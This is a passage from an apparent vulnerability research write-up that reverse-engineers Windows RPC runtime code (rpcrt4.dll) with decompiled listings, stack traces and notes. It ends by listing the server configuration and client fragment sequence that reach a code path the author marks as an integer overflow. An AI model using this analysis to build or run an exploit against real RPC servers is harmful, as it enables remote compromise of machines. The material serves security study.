    if (pOVar1 == (OSF_SBINDING *)0x0) {
      return (OSF_SBINDING *)0x0;
    }
  } while (*(int *)(pOVar1 + 8) != (int)uVar2);
  return pOVar1;
}


So it gets every item from the list, stored at OSF_CONNECTION instance + 0x80.

void * __thiscall SIMPLE_DICT::Next(SIMPLE_DICT *this,uint *param_1)

{
  void *pvVar1;
  uint uVar2;
  ulonglong uVar3;
  
  uVar2 = *param_1;
  if (uVar2 < *(uint *)(this + 8)) {
    do {
      uVar3 = (ulonglong)uVar2;
      uVar2 = uVar2 + 1;
      pvVar1 = *(void **)(*(longlong *)this + uVar3 * 8);
      *param_1 = uVar2;
      if (pvVar1 != (void *)0x0) {
        return pvVar1;
      }
    } while (uVar2 < *(uint *)(this + 8));
  }
  *param_1 = 0;
  return (void *)0x0;
}


The routine that walks the dictionary shows the dictionary implementation, basically it contains the item number at dictionary+0x8 and every item is long just 8 bytes,indeed it is a memory address. The second parameter passed to the Next() routine is just an memory address pointing to a value used to check if the right item is found during the walk. So at the end the vulnerable code is reached if and only if the address returned from the lookup, i.e. *plVar3 + 0x38 has second bit set

BeginRpcCall()
....
      plVar3 = (longlong *)
               OSF_SCONNECTION::LookupBinding((OSF_SCONNECTION *)param_1[0x26],tcp_payl->cxt_id); // get the item
      param_1[0x27] = (longlong)plVar3;
      if (plVar3 != (longlong *)0x0) {
        if ((*(byte *)(*plVar3 + 0x38) & 2) != 0) {
                    /* enter here in order to make param1 + 0x244 != 0 */
          *(undefined4 *)((longlong)param_1 + 0x244) = 1;
....


The structures links starting from the connection instance structure to the structure containing the flag checked that could lead us to set instance(OSF_SCONNECTION) + 0x244 to 1 is shown below.

typedef struct
{
  ...
  offset 0x130: dictionary_t *dictionary;
  ...
  offset 0x244: uint32_t flag; // must be 1 to enter in vulnerable code block in ProcessReceivedPDU() 
  ... 
} OSF_SCONNECTION_t

typedef struct
{
  ...
  offset 0x80: items_list_t *itemslist;
  ...
}dictionary_t;

typedef struct
{
  offset 0x0: item_t * items[items_no]
  offset 0x8: uint32_t items_no;
  ...
}items_list_t

typedef struct
{
  offset 0x0: flags_check_t *flags;
  ...
}item_t

typedef struct
{
  ...
  offset 0x38: uint32_t flag_checked 
  ...
}


At this point it’s important to understand where it creates the dictionary value and where the value is set. I found that the dictionary address changes every connect. So it should be created on the client connection.

To find where the dictionary is assigned to this[0x26], i.e. in the OSF_SCONNECTION instance, I placed a breakpoint on write on the memory address used to store the dictionary address, i.e. this[0x26].

This unveils where the dictionary is inserted into the instance object.


Seems that it is created at: rpcrt4.dll+0x3668f:OSF_SCALL::OSF_SCALL()


Below the stack trace:

rpcrt4.dll+0x3668f:OSF_SCALL::OSF_SCALL()
rpcrt4.dll+0x3620a:OSF_SCONNECTION::OSF_SCONNECTION()
rpcrt4.dll+0xd8e55:WS_NewConnection(CO_ADDRESS *param_1,BASE_CONNECTION **param_2)
rpcrt4.dll+0x4e266:CO_AddressThreadPoolCallback()


Since, LookupBinding(dictionary, item), searches the item starting from the param1+0x80 and since there is just one client that is connecting.


Below is shown in the debugger the link that starts from the connection instance to the flag contained in the item returned from lookup.


The dictionary is filled with an item already instantiated, i.e. with flag already set, in the OSF_SCONNECTION::ProcessPContextList() routine. Basically, this routine is reached from with the following stack:

rpcrt4.dll + 0x3e4f5: SIMPLE_DICT::Insert() 
rpcrt4.dll + 0x39473: OSF_SCONNECTION::ProcessPContextList()
rpcrt4.dll + 0x38b31: OSF_SCONNECTION::AssociationRequested()
rpcrt4.dll + 0x3d3b6: OSF_SCONNECTION::processReceiveComplete()

OSF_SCONNECTION::processReceiveComplete() is called every time arrive a packet from the client. The S in front of the namespace means that the routine is used by the RPC servers.


This routine, OSF_SCONNECTION::ProcessPContextList(), store the context id in a new dictionary item, from this routine could be found the exact structure of the dictionary items at instance(OSF_SCONNECTION)[0x26]. Unfortunately the item, i.e. the structure that contains the flag to force is not initialized on every connection.

Indeed I added a break point on the flag memory address to track the instructions overwriting it. I would expect some free/alloc on every connection just like the dictionary, but this never happened. This led me to think that it should be created during RPC Server initialization.

The item address, i.e. the object that contains the flag to force, is retrieved and set in the dictionary at:

0x57b54 RPC_SERVER::FindInterfaceTransfer()

                           
offset: 0x57a6c | mov rsi,qword ptr ds:[GlobalRpcServer]          ; RSI will contain the address of GlobalRPCServer
offset: 0x57aae | mov rdx,qword ptr ds:[rsi+120]                  ; most likely address of items                
offset: 0x57ab9 | mov rdi,qword ptr ds:[rdx+rax*8]                ; get the ith item       
offset: 0x57b30 | call RPC_INTERFACE::SelectTransferSyntax        ; check if the connection match with the interface                         
offset: 0x57b35 | test eax,eax                                    ; if eax == 0 return, interface/item found! 
offset: 0x57b54 | mov qword ptr ds:[rax],rdi                      ; Address of the item with the flag to force is returned writing it in *rax 

Basically, RPC_SERVER::FindInterfaceTransfer() is called by ProcessPContextList() and it is executed most likely to find the RPC interface according to the information sent by the client for example, uuid value.

Below the debugger view on 0x57b54.


Since GlobalRpcServer is fixed address, and it contains the address of the struct that contain the items, I just looked at the write reference on ghidra and found where GlobalRpcServer is filled with the struct address.

wchar_t ** InitializeRpcServer(undefined8 param_1,uchar **param_2,SIZE_T param_3)
{
  ppwVar24 = (wchar_t **)0x0;
  local_res8[0]._0_4_ = 0;
  ppwVar19 = ppwVar24;
  if (GlobalRpcServer == (RPC_SERVER *)0x0) {
    this = (RPC_SERVER *)AllocWrapper(0x1f0,param_2,param_3);
    ppwVar5 = ppwVar24;
    if (this != (RPC_SERVER *)0x0) {
      param_2 = local_res8;
      ppwVar5 = (wchar_t **)RPC_SERVER::RPC_SERVER(this,(long *)param_2);
      ppwVar19 = (wchar_t **)(ulonglong)(uint)local_res8[0];
    }
    if (ppwVar5 == (wchar_t **)0x0) {
      GlobalRpcServer = (RPC_SERVER *)ppwVar5; 
      return (wchar_t **)0xe;
    }
    GlobalRpcServer = (RPC_SERVER *)ppwVar5; // OFFSET: 0xb3d2; here the global rpc server is set to a new fresh memory.
    ...
  }
  ...
}


The routine InitializeRpcServer() is called from a RpcServerUseProtseqEpW() that is directly called by the RPC server! As shown in the debugger view, *GlobalRpcServer + 0x120 is already filled but *(*GlobalRpcServer + 0x120) is equal to NULL.


Setting a breakpoint on memory write of: *(*GlobalRpcServer + 0x120) , I found where the address of the item is set! Below is shown the stack trace:

rpcrt4.dll + 0x3e4f9 at SIMPLE_DICT::Insert() 
rpcrt4.dll + 0xd498  at RPC_INTERFACE * RPC_SERVER::FindOrCreateInterfaceInternal()
rpcrt4.dll + 0xd196  at void RPC_SERVER::RegisterInterface() 
rpcrt4.dll + 0x7271e at void RpcServerRegisterIf()
server rpc function 


From the memory contents shown below:


The *item + 0x38 appears to be NULL, let’s set a breakpoint to that memory address. To resume up, the flag to force is reachable from:

typedef struct
{
  rpc_interfaces_t **addresses;
}GlobalRpcServer_t;

typedef struct
{
  ...
  offset 0x120:  item_t **items
  ...
}rpc_interfaces_t;

typedef struct
{
  ...
  offset 0x38:  uint32_t flag_checked // Flag check in BeginRpcCall()
  ...
}item_t

It was clear that our flag to force has not already set so I set up another write breakpoint on *item + 0x38 to find where it is set! So, I found the point where the flag is modified, as visibile in the debugger.


The code that modifies the flag is reached from this stack trace.

rpcrt4.dll + 0xd30e : RPC_INTERFACE::RegisterTypeManager() 
rpcrt4.dll + 0xd1bf : void RPC_SERVER::RegisterInterface() 
rpcrt4.dll + 0x7271e: void RpcServerRegisterIf() 
RPC server functions


void RpcServerRegisterIf(uint *param_1,uint *uuid,SIZE_T param_3)

{
  ...
    RPC_SERVER::RegisterInterface
              (GlobalRpcServer,param_1,uuid,param_3,0,0x4d2,gMaxRpcSize,(FuncDef2 *)0x0,
               (ushort **)0x0,(RPCP_INTERFACE_GROUP *)0x0);

  ...
}

void RPC_SERVER::RegisterInterface
               (RPC_SERVER *param_1,uint *param_2,uint *param_3,SIZE_T param_4,uint param_5,
               uint param_6,uint param_7,FuncDef2 *param_8,ushort **param_9,
               RPCP_INTERFACE_GROUP *param_10)

{
  if (param_3 != (uint *)0x0) {
    local_80 = param_3;
  }
  local_58 = ZEXT816(0);
  local_78 = param_2;
  local_60 = param_3;
  ...
  puVar6 = RPC_INTERFACE::RegisterTypeManager(pRVar5,local_60,param_4);
  ...
}

RPC_INTERFACE::RegisterTypeManager(RPC_INTERFACE *param_1,undefined4 *param_2,SIZE_T param_3)
{
  ...
  if ((param_2 == (undefined4 *)0x0) ||
     (iVar6 = RPC_UUID::IsNullUuid((RPC_UUID *)param_2), iVar6 != 0)) {
    if ((*(uint *)(param_1 + 0x38) & 1) == 0) {
      *(int *)(param_1 + 200) = *(int *)(param_1 + 200) + 1;
      *(uint *)(param_1 + 0x38) = *(uint *)(param_1 + 0x38) | 1; // SET to 1 the flag!
      *(SIZE_T *)(param_1 + 0x40) = param_3;
      RtlLeaveCriticalSection(pRVar1);
      return (undefined4 *)0x0;
    }
    puVar11 = (undefined4 *)0x6b0;
  }
  ...
}

Looking at the stack trace and the code, it’s clear that the RPC server implementation called with RpcServerRegisterIf() without specifying any MgrTypeUuid. At this point it was most likely that I could, from client side, alter in some way that flag that trigger the vulnerable code.

Anyway, backing to the BeginRpcCall(), in order to execute vulnerable code it’s required that the item_t flag value has the second bit set. Since that value is never written, I could not use the debugger anymore to find where the second bit’s flag is set. So, I searched for instruction patterns basing on the information I got:

  1. The value is bitmask flag, this was clear because the values are checked with TEST instruction and because the value, i.e. 1 has been set with an or operator.
  2. The item_t is a kind of structure, most likely the access to the flag member more or less the same, i.e. [register + 0x38]
  3. Flag is 4 byte long

According to these information I searched for instruction like: or dword ptr [anyregs+0x38], 2


RPC_INTERFACE::RPC_INTERFACE
          (RPC_INTERFACE *this,_RPC_SERVER_INTERFACE *param_1,RPC_SERVER *param_2,uint param_3,
          uint param_4,uint param_5,FuncDef2 *param_6,void *param_7,long *param_8,
          RPCP_INTERFACE_GROUP *param_9)

{
  RPC_INTERFACE *pRVar1;
  int iVar2;
  int iVar3;
  
  *(undefined4 *)(this + 8) = 0;
  RtlInitializeCriticalSectionAndSpinCount(this + 0x10,0);
  *(undefined4 *)(this + 0x38) = 0;
  *(undefined4 *)(this + 200) = 0;
  pRVar1 = this + 0x170;
  *(undefined (**) [16])(this + 0xd8) = (undefined (*) [16])(this + 0xe8);
  *(undefined8 *)(this + 0xe0) = 4;
  *(undefined (*) [16])(this + 0xe8) = ZEXT816(0);
  *(undefined (*) [16])(this + 0xf8) = ZEXT816(0);
  *(undefined4 *)(this + 0x14c) = 0;
  *(undefined4 *)(this + 0x150) = 0;
  *(undefined4 *)(this + 0x154) = 0;
  *(undefined4 *)(this + 0x158) = 0;
  *(undefined4 *)(this + 0x15c) = 0;
  *(undefined4 *)(this + 0x160) = 0;
  *(undefined4 *)(this + 0x164) = 0;
  *(undefined4 *)(this + 0x168) = 0;
  *(undefined4 *)(this + 0x16c) = 0;
  RtlInitializeSRWLock(this + 0x1e0);
  *(RPC_INTERFACE **)(this + 0x178) = pRVar1;
  *(RPC_INTERFACE **)pRVar1 = pRVar1;
  *(undefined4 *)(this + 0x180) = 0;
  *(undefined4 *)(this + 0x1e8) = 0;
  *(undefined (**) [16])(this + 0x1f0) = (undefined (*) [16])(this + 0x200);
  *(undefined8 *)(this + 0x1f8) = 4;
  *(undefined (*) [16])(this + 0x200) = ZEXT816(0);
  *(undefined (*) [16])(this + 0x210) = ZEXT816(0);
  *(undefined4 *)(this + 0x220) = 0;
  *(undefined8 *)(this + 0x228) = 0;
  *(RPC_SERVER **)this = param_2;
  *(undefined8 *)(this + 0xd0) = 0;
  *(undefined8 *)(this + 0xb8) = 0;
  *(undefined8 *)(this + 0x230) = 0;
  *(undefined8 *)(this + 0x238) = 0;
  iVar3 = UpdateRpcInterfaceInformation
                    ((longlong)this,(uint *)param_1,(ushort **)(ulonglong)param_3,param_4,param_5,
                     (longlong)param_6,(ushort **)param_7,(longlong)param_9);
  iVar2 = *(int *)param_1;
  *param_8 = iVar3;
  if ((iVar2 == 0x60) && (((byte)param_1[0x58] & 1) != 0)) {
    *(uint *)(this + 0x38) = *(uint *)(this + 0x38) | 2;
  }
  return this;
}

Seems that the or is executed under some conditions. At this point, it was required to verify this assumption, I set up a breakpoint on those conditions: offset: 0xd87c


rpcrt4.dll + 0xd87c at RPC_INTERFACE::RPC_INTERFACE()
rpcrt4.dll + 0xb82e at InitializeRpcServer()
rpcrt4.dll + x      at PerformRpcInitialization()
rpcrt4.dll + y      at RpcServerUseProtseqEpW()


wchar_t ** InitializeRpcServer(undefined8 param_1,uchar **param_2,SIZE_T param_3)
{
    ...
      this_01 = (RPC_INTERFACE *)
                RPC_INTERFACE::RPC_INTERFACE
                          (this_00,(_RPC_SERVER_INTERFACE *)&DAT_1800e7470,GlobalRpcServer,1,0x4d2,
                           0x1000,(FuncDef2 *)0x0,(void *)0x0,(long *)local_res8,
                           (RPCP_INTERFACE_GROUP *)0x0);
    ...
}

The parameter on which the condition is check is fixed, i.e. DAT_1800e7470, and never altered.


But, going on with the debugger, I break on the same point. This time with another stack trace that starts exactly in my rpc server test!


rpcrt4.dll + 0xd87c  at RPC_INTERFACE::RPC_INTERFACE()
rpcrt4.dll + 0xd475  at RPC_INTERFACE * RPC_SERVER::FindOrCreateInterfaceInternal()
rpcrt4.dll + 0xd196  at void RPC_SERVER::RegisterInterface()
rpcrt4.dll + 0x7271e at void RpcServerRegisterIf()
RPCServerTest.exe: main

RPC_INTERFACE *
RPC_SERVER::FindOrCreateInterfaceInternal
          (RPC_SERVER *param_1,_RPC_SERVER_INTERFACE *param_2,ulonglong param_3,uint param_4,
          uint param_5,FuncDef2 *param_6,void *param_7,long *param_8,int *param_9,
          RPCP_INTERFACE_GROUP *param_10)

{
...
  pRVar5 = (RPC_INTERFACE *)AllocWrapper(0x240,p_Var8,uVar10);
  uVar2 = (uint)p_Var8;
  this = pRVar9;
  if (pRVar5 != (RPC_INTERFACE *)0x0) {
    p_Var8 = param_2;
    this = (RPC_INTERFACE *)
           RPC_INTERFACE::RPC_INTERFACE
                     (pRVar5,param_2,param_1,(uint)param_3,param_4,param_5,param_6,param_7,param_8,
                      param_10);
    uVar2 = (uint)p_Var8;
  }
...
}


void RPC_SERVER::RegisterInterface
               (RPC_SERVER *param_1,uint *param_2,uint *param_3,SIZE_T param_4,uint param_5,
               uint param_6,uint param_7,FuncDef2 *param_8,ushort **param_9,
               RPCP_INTERFACE_GROUP *param_10)

{
  ...
  RtlEnterCriticalSection(param_1);
  pRVar5 = FindOrCreateInterfaceInternal
                       (param_1,(_RPC_SERVER_INTERFACE *)param_2,(ulonglong)param_5,param_6,local_84
                        ,param_8,param_9,(long *)&local_80,(int *)&local_78,local_68);
  ...
}


void RpcServerRegisterIf(uint *param_1,uint *uuid,SIZE_T param_3)
{
  MUTEX *pMVar1;
  void *in_R9;
  undefined4 in_stack_ffffffffffffffc8;
  undefined4 in_stack_ffffffffffffffcc;
  
                    /* 0x726c0  1483  RpcServerRegisterIf */
  if ((RpcHasBeenInitialized != 0) ||
     (pMVar1 = PerformRpcInitialization
                         ((int)param_1,uuid,(int)param_3,in_R9,
                          (void *)CONCAT44(in_stack_ffffffffffffffcc,in_stack_ffffffffffffffc8)),
     (int)pMVar1 == 0)) {
    RPC_SERVER::RegisterInterface
              (GlobalRpcServer,param_1,uuid,param_3,0,0x4d2,gMaxRpcSize,(FuncDef2 *)0x0,
               (ushort **)0x0,(RPCP_INTERFACE_GROUP *)0x0);
  }
  return;
}

Basically, that conditions failed because of the first parameter passed by my rpc server test application to RpcServerRegisterIf().

At this point I looked at my code to find which kind of configuration I used and how I could change it in My test server app.

API prototype > 
  RPC_STATUS RpcServerRegisterIf(
    RPC_IF_HANDLE IfSpec,
    UUID          *MgrTypeUuid,
    RPC_MGR_EPV   *MgrEpv
  );

My RpcServerRegisterIf call > 
   status = RpcServerRegisterIf(interfaces_v1_0_s_ifspec,
        NULL,
        NULL);

Value of interfaces_v1_0_s_ifspec >
  static const RPC_SERVER_INTERFACE interfaces___RpcServerInterface =
    {
    sizeof(RPC_SERVER_INTERFACE),
    ,{1,0}},
    ,{2,0}},
    (RPC_DISPATCH_TABLE*)&interfaces_v1_0_DispatchTable,
    0, 
    0,
    0,
    &interfaces_ServerInfo,
    0x04000000 // param_1[0x58]
    };

Of course, the value of interfaces_v1_0_s_ifspec is equal to the one shown in the last debugger image! Since, the failing check is done on param_1[0x58] & 1, I changed 0x04000000 to 0x04000001 in order to have the vulnerable code executing!


Pay attention that this is not triggered by the client, in the previous screen the server just configure itself, no client connected to it. Finally in the BeginRpcCall() the check is satisfied.


Finally, the check inside the ProcessReceivedPDU() is satisfied, but the vulnerable code still not reached because of:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?)
{
    ...
          if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0)) { // not enter here!
            ...
          }
    ...
          else if (pkt_tyoe == 0) { // packet is a request
                    /* should not enter here  */
            if (*(int *)(this + 0x214) == 0) {
            ...
            goto _OSF_SCALL::DispatchRPCCall // that handle the request
            }
            //vulnerable code
          }
          
  ...
}

The problem now is to find under which conditions (this + 0x214) is set. I already saw that in the ActivateCall() routine called every time an RPC communication starts *(this + 0x214) is set to 0. For this, for sure on first call that value cannot be different by 0.

I decided to dig a bit in the code just to understand better how the messages are handled. The messages are processed according to the packet type defined in the DCERPC field,Reference, in the routine void OSF_SCONNECTION::ProcessReceiveComplete().

void OSF_SCONNECTION::ProcessReceiveComplete{

  if (pkt_type == 0) { // packet is a request
    if (*(int *)(this + 3) == 0) { // not investigated
        uVar6 = tcp_received->call_id;
        if (*(int *)((longlong)this + 0x17c) < (int)uVar6) { //should enter here if the call id is new, i.e. the packet refer to a new request
          ...
          ppvVar9 = (LPVOID *)OSF_SCALL::OSF_SCALL(puVar11,(longlong)this,(long *)pdVar18); // maybe instantiate the object to represent the call request
          ...
          iVar4 = OSF_SCALL::BeginRpcCall((longlong *)ppvVar9,tcp_received,ppOVar20);
          ...
        }
        else{
          ppvVar9 = (LPVOID *)FindCall((OSF_SCONNECTION *)this,uVar6); // the call id has already view in the communication there should be an object, FIND IT!
          if (ppvVar9 == (LPVOID *)0x0) { // not found this is a new call id request, should have first fragment set and not reuse already used call ids?
            uVar6 = tcp_received->call_id;
            if (((int)uVar6 < *(int *)((longlong)this + 0x17c)) ||
               ((tcp_received->pkt_flags & 1U) == 0)) { // should not be 
              uVar6 = *(int *)((longlong)this + 0x17c) - uVar6;
              goto reach_fault?;
            }
            goto LAB_18009016d;
          }
call_processReceivedPDU: // call id object found just process new message
          uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)ppvVar9,tcp_received,uVar13,0);
          ...
        }
    }
    else
    {
        uVar6 = tcp_received->call_id;
        if ((*(byte *)&tcp_received->data_repres & 0xf0) != 0x10) {
          uVar6 = uVar6 >> 0x18 | (uVar6 & 0xff0000) >> 8 | (uVar6 & 0xff00) << 8 | uVar6 << 0x18;
        }
        if ((tcp_received->pkt_flags & 1U) == 0) {
          if (*(int *)((longlong)this + 0x1c) != 0) {
            uVar6 = *(int *)((longlong)this + 0x17c) - uVar6;
reach_fault?:
            if (0x95 < uVar6) goto goto_SendFAULT;
            goto LAB_180090122;
          }
        }
        else if (*(int *)((longlong)this + 0x1c) != 0) { // this+0x1c could be a flag true or false that says if the call id is new or not
          REFERENCED_OBJECT::AddReference((longlong)this,plVar15,pdVar18);
          *(undefined4 *)((longlong)this + 0x1c) = 0;
          *(uint *)((longlong)this + 0x17c) = uVar6;
          *(uint *)(this[0xf] + 0x1c8) = uVar6;
          iVar4 = OSF_SCALL::BeginRpcCall((longlong *)this[0xf],tcp_received,ppOVar20);
          goto LAB_18003d2b5;
        }
LAB_18008ffc1:
        uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)this[0xf],tcp_received,uVar13,0);
        iVar4 = (int)uVar8;
    }
    ...
  }
  ...
  if (tcp_received->pkt_type == '\x0b') { // Executed when the client send a BIND request
      if (this[9] != 0) {
        uVar3 = 0;
        goto LAB_18008ff47;
      }
      iVar4 = AssociationRequested((OSF_SCONNECTION *)this,tcp_received,uVar13,uVar6);
  }
  ...
}

BeginRpcCall() ends in calling ProcessReceivedPDU() that is the primary function doing the packet parse job. ProcessReceivedPDU() when arrive the first and last fragment request:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
        *(uint *)(this + 0x1d8) = local_res8[0]; // set the fragment len in the object
        *(char **)pdVar1 = tcp_payload->data;
        tcp_payload = pdVar14;
dispatchRPCCall:
                    /* if last frag set with first frag */
        *(undefined4 *)(this + 0x21c) = 3;
        if (((byte)this[0x2e0] & 4) != 0) {
          LOCK();
          *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
               *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
          *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
        }
        plVar13 = (longlong *)((ulonglong)tcp_payload & 0xffffffffffffff00 | (ulonglong)pkt_tyoe);
LAB_18003ad4f:
        uVar9 = DispatchRPCCall((longlong *)this,plVar13,puVar17); // process the remote call
        return uVar9;
  ...
}

ProcessReceivedPDU() when arrives the first fragment fragment request with last fragment flag unset:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
          /* it is not a the last frag */
          uVar5 = tcp_payload->alloc_hint; // client suggest to the server how many bytes it will need to handle the full request
          if (uVar5 == 0) {
            *(uint *)(this + 0x248) = local_res8[0];
            uVar5 = local_res8[0]; // set to the frag len if alloc hint is 0
          }
          else {
            *(uint *)(this + 0x248) = uVar5;
          }
          puVar17 = (uint *)(ulonglong)uVar5;
      /* Could not allocate more than: (this +0x138)+0x148 = 0x400000 */
          if (*(uint *)(**(longlong **)(this + 0x138) + 0x148) <= uVar5 &&
              uVar5 != *(uint *)(**(longlong **)(this + 0x138) + 0x148)) { // check to avoid possible integer overflow
            piVar11 = local_80;
            uVar18 = 0x1072;
            local_80[0] = 3;
            local_78 = uVar5;
            goto goto_adderror_and_send_fault;
          }
          *(undefined4 *)(this + 0x1d8) = 0;
          pdVar14 = pdVar1;
      /* allocate buffer for all the fragments data */
          lVar7 = GetBufferDo((OSF_SCALL *)tcp_payload->data,(void **)pdVar1,uVar5,0,0, in_stack_ffffffffffffff60);
          if (lVar7 == 0) goto do_;
fail:
          pdVar14 = (dce_rpc_t *)0xe;
          goto cleanupAndSendFault;
  ...
}

long __thiscall
OSF_SCALL::GetBufferDo
          (OSF_SCALL *this,void **param_1,uint len,int param_3,uint param_4,ulong param_5)

{
  long lVar1;
  OSF_SCALL *pOVar2;
  OSF_SCALL *dst;
  ulonglong uVar3;
  OSF_SCALL *local_res8;
  
  local_res8 = this;
  lVar1 = OSF_SCONNECTION::TransGetBuffer((OSF_SCONNECTION *)this,&local_res8,len + 0x18);
  if (lVar1 == 0) {
    if (param_3 == 0) {
      *param_1 = local_res8 + 0x18;
    }
    else {
      uVar3 = (ulonglong)param_4;
      dst = local_res8 + 0x18;
      pOVar2 = dst;
      memcpy(dst,*param_1,param_4);
      if ((longlong)*param_1 - 0x18U != 0) {
        BCACHE::Free((ulonglong)pOVar2,(longlong)*param_1 - 0x18U,uVar3);
      }
      *param_1 = dst;
    }
    lVar1 = 0;
  }
  else {
    lVar1 = 0xe;
  }
  return lVar1;
}

If the fragment received is the first but not the last then a new memory is allocated using GetBufferDo() routine. It’s interesting the check on the allocation_hint/fragment len that cannot be greater or equal to 0x400000, this is very important because of the strange implementation of GetBufferDo() that allocate len + 0x18 bytes.

If the packet is not the first fragment and not the last fragment:

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
                    /* should enter this branch */
        if (*(void **)pdVar1 != (void *)0x0) {
do_:
          uVar5 = local_res8[0];
          if ((*(int *)(this + 0x244) == 0) || (*(int *)(this + 0x1cc) != 0)) { // !RPC_INTERFACE_HAS_PIPES
            if ((*(int *)(this + 0x214) == 0) || (*(int *)(this + 0x1cc) != 0)) {
/* fragment len + current copied */
              uVar5 = local_res8[0] + *(uint *)(this + 0x1d8);
/* alloc_hint <= fragment length  */
              if (*(uint *)(this + 0x248) <= uVar5 && uVar5 != *(uint *)(this + 0x248)) {
                if (*(int *)(this + 0x1cc) != 0) goto LAB_18008ea09;
                *(uint *)(this + 0x248) = uVar5;
/* overflow check 0x40000  */
                puVar17 = (uint *)(**(OSF_SCALL ***)(this + 0x138) + 0x148);
                if (*puVar17 <= uVar5 && uVar5 != *puVar17) {
                  piVar11 = local_50;
                  uVar18 = 0x1073;
                  local_50[0] = 3;
                  local_48 = uVar5;
                  goto goto_adderror_and_send_fault;
                }
// reallocate because fragment len is greater than the alloc hint used during first fragment! 
                lVar7 = GetBufferDo(\**(OSF_SCALL ***)(this + 0x138),(void **)pdVar1,uVar5,1,
                                    *(uint *)(this + 0x1d8),in_stack_ffffffffffffff60);
                if (lVar7 != 0) goto fail;
              }
              uVar5 = local_res8[0];
              puVar17 = (uint *)(ulonglong)local_res8[0];
//copy fragment data into the alloced buffer
              memcpy((void *)((longlong)*(void **)pdVar1 + (ulonglong)*(uint *)(this + 0x1d8)),tcp_payload->data,local_res8[0]);
              *(uint *)(this + 0x1d8) = *(int *)(this + 0x1d8) + uVar5;
              if ((pkt_flags & 2) == 0) {
                return 0; // if it is not the last fragment return 0
              }
              goto dispatchRPCCall; // dispatch the request only if it is the last fragment
            }
      }
      else if (pkt_tyoe == 0) {
    /* here if the packet type is 0, i.e. request */
        if (*(int *)(this + 0x214) == 0) {
          ...               
          uVar15 = GetBufferDo(\**(OSF_SCALL ***)(this + 0x138),(void **)pdVar1,uVar15,1, *(uint *)(this + 0x1d8),in_stack_ffffffffffffff60);
          pdVar14 = (dce_rpc_t *)(ulonglong)uVar15;
          if (uVar15 != 0) goto cleanupAndSendFault;
          ...
              memcpy((void *)((ulonglong)*(uint *)(this + 0x1d8) + *(longlong *)(this + 0xe0)), tcp_payload->data,uVar5);
          ...
              *(uint *)(this + 0x1d8) = *(int *)(this + 0x1d8) + uVar5;
              (\**(code \**)(**(longlong **)(this + 0x130) + 0x40))();
              if (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) {
                return 0;
              }
              if ((pkt_flags & 2) == 0) {
                *(undefined4 *)(this + 0x230) = 0;
              }
              else {
                *(undefined4 *)(this + 0x21c) = 3;
                if (((byte)this[0x2e0] & 4) != 0) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
              }
              plVar13 = (longlong *)0x0;
              goto Dispatch_rpc_call;
        }
        else{
          ...
          /* store frag len */
          uVar5 = local_res8[0];
          iVar8 = QUEUE::PutOnQueue((QUEUE *)(this + 600),tcp_payload->data,local_res8[0]);
          if (iVar8 == 0) {
          /* integer overflow! */
          *(uint *)(this + 0x24c) = *(int *)(this + 0x24c) + uVar5;
          ...
        }
}

Basically, the middle fragments are just copied in the alloced buffer under some conditions.

The DispatchRPC() seems to be the dispatcher of the full request, indeed it calls then the routine to handle the request, unmarshalling parameters and executing the
procedure remotely invoked. It is interesting that:

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  if (*(int *)((longlong)param_1 + 0x1cc) < 1) {
    *(undefined4 *)((longlong)param_1 + 0x214) = 1;
    ...
}

*(int *)((longlong)param_1 + 0x1cc seems to be zero so ` *(undefined4 *)((longlong)param_1 + 0x214) = 1;` this instruction takes place.


It’s possible to force the DispatchRpcCall() and still accept fragments for the same call id? The response to this question is yes!

Looking at ProcessReceivedPDU() exists a path that leads to execute the DispatchRpcCall() without sending any last fragment. The constraints:

  1. Server configured with RPC_INTERFACE_HAS_PIPES -> int at offset 0x58 in the rpc interface defined in the server has second bit to 1
  2. Client sends a first fragment, that initiliaze the call id object
  3. Client sends the second fragment without first and last flag enabled, this ends to call DispatchRpcCall() that sets param_1 + 0x214 to 1.
  4. Client alloc hint sent in the first fragment must be equal to the copied buffer len at the end of second fragment.

This will lead the code to enter DispatchRpcCall() and make nexts client’s fragments to be handled by the buggy code.

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
            else if (pkt_tyoe == 0) {
                    /* here if the packet type is 0, i.e. request */
            if (*(int *)(this + 0x214) == 0) {
              puVar17 = (uint *)(ulonglong)local_res8[0];
              uVar15 = *(uint *)(this + 0x1d8) + local_res8[0];
              ...
              if (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) { // cheat on this to make fragments appear as the last!
                // 0x1d8 contain already copied bytes until this request!
                // 0x248 contains the alloc hint!
                return 0;
              }
              if ((pkt_flags & 2) == 0) {
                *(undefined4 *)(this + 0x230) = 0;
              }
              else {
                *(undefined4 *)(this + 0x21c) = 3;
                if (((byte)this[0x2e0] & 4) != 0) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
              }
              plVar13 = (longlong *)0x0;
              goto Dispatch_rpc_call;
  ...
}

